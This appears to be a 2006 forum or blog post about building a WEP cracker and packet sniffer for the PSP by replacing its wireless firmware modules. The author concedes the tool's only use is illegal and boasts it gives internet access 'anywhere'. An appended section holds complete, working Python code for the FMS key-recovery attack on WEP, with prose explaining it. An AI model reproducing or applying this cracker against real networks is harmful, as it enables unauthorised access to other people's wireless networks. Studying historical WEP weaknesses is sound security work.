7/31/06 Updated News!
First off, sorry for not keeping up the updates. I have been working on this for a bit and even bricked two PSPs in the process, but fortunately I was able to recover the second one with the custom firmware. I still haven't stopped on this project; in fact I have been working on it more since the custom firmware came out. But one problem I keep getting hit with is that when I add wlan2.prx and try to hook it with the original Sony wlan.prx, it either bricks the PSP (hence no release) or the Wi-Fi stops working altogether. To remove it and get back a normal PSP I have to update and then downgrade to get it taken off. The funny part is that when I replaced wlan.prx in DevHook's emulated 1.50, I actually got a stable PSP that won't brick or freeze, and the Wi-Fi works. But still no luck on getting it to capture packets, and I'm not sure if it's the prx or the app, so I need to eliminate one.
Here's the big news: I'm currently getting in contact with the Shmoo Group, mainly Snax (creators of AirSnort), to see if they can give me a helping hand getting AirSnort ported to the PSP. If so, that problem will be eliminated and I can focus on getting wlan2.prx and wlan.prx to hook properly. I'm also going to see if lord strum or someone can help me get the firmware to register the hook (if I even have to hook), or rather just replace wlan.prx and get it signed by "Sony" so that it cannot brick the PSP and is seen as part of the firmware.
Well, with the two PSPs I have, I have successfully downgraded to 1.0, which lets me run custom firmware. I also got DevHook to run custom firmware for 2.5 and am currently working with the 2.6 firmware. I was able to modify easy stuff like gameboot.pmf and the like just to see if it works, and it does, so I think just replacing .prx files that have similar strings and code will work as well, unless I make a whole new firmware, but that will require a lot of help because I'm not so sure how to go that route. So here is my call for help: anyone interested in designing custom firmware, please email me. Also I saw a very good thing in 2.6: it has a .prx called ad_hocdiscovery.prx, which I believe is what is used to scan for players and which I can probably use to my advantage to write a new .prx and add it to the 4 .txt strings so it will boot up. I know I haven't posted in a while, but with all these firmware hacks I wanted a chance to play around with them and see what I found, and 2.6+ seems to be the winner with the .prx I found. It's nice to have DevHook to test my custom firmware and not worry about bricking the PSP. Now it's time for the security tools to come alive.
EDIT: Just to make it clear, I don't recommend the use of this for illegal purposes, even though that's all it does; to me it is rather for pure study of how the PSP can be a security vulnerability. I have done quite a lot of security checks at my job with the PC and found some rather interesting results on how they affect a network, so this is just my part to see how a hacktool can work.
EDIT #2: Everyone keeps mentioning this is illegal. I'm going to say it one more time: it's not the program that's illegal, it's the user and how they use it that is illegal. Just like it's illegal to download music but not illegal to use LimeWire (which allows you to download the music).
I'm not sure if this post will be kept or whether my current project will be appreciated by the PSP homebrew community; it might in fact be looked down on. But honestly this is more about proving the power the PSP has and the things it can do. As of right now I'm currently working on a Wireless WEP Cracker. It's in the very early stages and currently I only have some success on a 1.0 PSP. For those that do not know what WEP is, it is Wired Equivalent Privacy. It is used to protect wireless networks, keeping just about anyone from accessing the network without the passphrase/WEP key. What the WEP cracker does is take packets off the air and look at their IV (initialization vector): a 24-bit value that every WEP packet carries in the clear, which WEP sticks in front of the secret key to make the per-packet RC4 key. With certain "weak" IVs, the first encrypted byte (which is always a known header byte) statistically leaks one byte of the WEP key, so collect enough of those packets and you have the whole key. So if used with the Wireless Sniffer for the PSP you can pretty much get an internet connection anywhere unless WPA is being used, and I hope down the road to add a dictionary attack and brute force attack to the WEP cracker for WPA, but that's way down the road. My results so far are that the wireless files in the firmware actually need to be replaced with homebrew ones, so the wireless can be put in a monitor type mode to passively collect the packets. That's where my problem lies: I need to know what the file for the wireless is called in the firmware, preferably for FW 1.5. Once I get that I can start looking at the file and seeing where it can be altered or recreated along the lines of the Prism2 driver. Then installing it safely back on the PSP, that's going to be the hardest part. So I already have a dev for the actual program that runs on 1.0 all right, but I really have to work out the kinks. Any help or opinions would be appreciated. Just thought I would let everyone know.
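To show concretely what "the packets have part of the WEP key" means, here is an added worked example; it is not code from this project, from the PSP sniffer, or from AirSnort. It constructs a WEP capture in which the access point happens to use the FMS weak IVs (B+3, 255, X), then plays a passive attacker who sees only the IV and the ciphertext and recovers a 40-bit key one byte at a time, checking the final answer against the frame's CRC-32 ICV. The key, the payload and the IV set are constructed for the demo; a real capture mixes these IVs with ordinary ones, which is why a sniffer has to sit in monitor mode for a long time.

```python
import zlib

SNAP_FIRST_BYTE = 0xAA   # LLC DSAP: the first plaintext byte of every 802.11 data frame
WEAK_IV_SECOND_BYTE = 0xFF
TOP_CANDIDATES = 4       # how many top-voted bytes to branch on when votes are close


def rc4_ksa(key):
    """RC4 key scheduling: returns the permuted S-box for this key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_keystream(key, n):
    """First n bytes of RC4 keystream (PRGA) for the given key."""
    s = rc4_ksa(key)
    i = j = 0
    out = []
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return out


def wep_encrypt(secret_key, iv, data):
    """WEP frame body: RC4(IV || key) over data || CRC-32 ICV. The IV is sent in the clear."""
    plain = data + zlib.crc32(data).to_bytes(4, "little")
    ks = rc4_keystream(list(iv) + list(secret_key), len(plain))
    return bytes(p ^ k for p, k in zip(plain, ks))


def wep_decrypt(secret_key, iv, body):
    """Return the payload if the ICV verifies under this key, else None."""
    ks = rc4_keystream(list(iv) + list(secret_key), len(body))
    plain = bytes(c ^ k for c, k in zip(body, ks))
    data, icv = plain[:-4], plain[-4:]
    return data if zlib.crc32(data).to_bytes(4, "little") == icv else None


def ap_weak_iv_capture(secret_key):
    """Constructed capture (not real traffic): for each key byte position B,
    one frame per FMS weak IV (B+3, 255, X). The attacker keeps only (IV, body)."""
    payload = bytes([0xAA, 0xAA, 0x03, 0, 0, 0, 0x08, 0x00]) + b"constructed payload"
    capture = []
    for b in range(len(secret_key)):
        for x in range(256):
            iv = (b + 3, WEAK_IV_SECOND_BYTE, x)
            capture.append((iv, wep_encrypt(secret_key, iv, payload)))
    return capture


def fms_vote(iv, first_cipher_byte, known):
    """One frame's vote for key byte number len(known). The first B+3 KSA steps
    depend only on public data (the IV) and key bytes already recovered. If the
    S-box is in the FMS 'resolved' state, the first keystream byte reveals the
    next key byte with probability about 5%; otherwise the vote is noise."""
    b = len(known)
    key = list(iv) + known
    s = list(range(256))
    j = 0
    for i in range(b + 3):
        j = (j + s[i] + key[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
    if s[1] >= b + 3 or (s[1] + s[s[1]]) & 0xFF != b + 3:
        return None
    z = first_cipher_byte ^ SNAP_FIRST_BYTE   # first keystream byte, thanks to the known header
    return (s.index(z) - j - s[b + 3]) & 0xFF


def fms_recover_key(capture, key_len):
    """Depth-first search over the top-voted candidates for each byte; the CRC-32
    ICV of one captured frame decides which full key is the real one."""
    iv0, body0 = capture[0]

    def search(known):
        if len(known) == key_len:
            return known if wep_decrypt(known, iv0, body0) is not None else None
        votes = [0] * 256
        for iv, body in capture:
            c = fms_vote(iv, body[0], known)
            if c is not None:
                votes[c] += 1
        for c in sorted(range(256), key=lambda c: -votes[c])[:TOP_CANDIDATES]:
            found = search(known + [c])
            if found is not None:
                return found
        return None

    return search([])


if __name__ == "__main__":
    demo_key = [0x1F, 0x2E, 0x3D, 0x4C, 0x5B]        # constructed 40-bit key
    print([hex(b) for b in fms_recover_key(ap_weak_iv_capture(demo_key), 5)])
```

The voting is the whole trick: the attacker never touches the secret bytes directly, it only simulates the first few steps of the key schedule with what it already knows and asks what the observed keystream byte would imply. Because each weak IV only tells the truth about 5% of the time, the right byte merely leads the vote rather than winning outright, which is why a practical cracker branches on the top few candidates and lets the ICV settle it, and why thousands of weak IVs are needed against real traffic.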